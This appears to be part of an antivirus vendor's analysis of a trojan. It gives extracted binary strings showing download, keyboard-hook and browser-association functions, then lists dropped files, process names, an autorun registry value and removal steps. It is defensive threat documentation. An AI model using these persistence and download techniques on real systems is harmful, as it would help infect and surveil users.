LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

dxdiag.exe_632:

.text
`.data
.rsrc
MSVBVM60.DLL
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
user32.dll
EnumChildWindows
VBA6.DLL
dxdiag.exe

CodecFixDivx.exe_296:


CodecFixDivx.exe_296_rwx_004A0000_0000D000:

.text
`.rdata
@.data
.rsrc
@.reloc
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setdd.exe:272
    7za.exe:1932
    CodecFixDivx.exe:244
    mesox.exe:1904
    %original file name%.exe:348
    dxdiag.exe:632
    irsetup.exe:492

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setdd.exe (10753 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00046f60.a (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000479ef.a (1774 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\winrar-x64-520.exe (65332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\a.7z (21345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\after.exe (27907 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (20 bytes)
    %WinDir%\chromebrowser.exe (164484 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dxdiag.exe (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\acc.enc (20527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\CodecFixDivx.enc (16975 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CodecFixDivx.exe (18485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__3137_il66746.enc (14515 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\dxdiag.enc (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G963G9AF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHANSXIV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HDQZBC5E\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setupfiles.txt (44 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@payment[1].txt (303 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@pastebin[1].txt (217 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0XUJW5MR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mesox.exe (3972701 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "chromebrowser" = "%WinDir%\chromebrowser.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
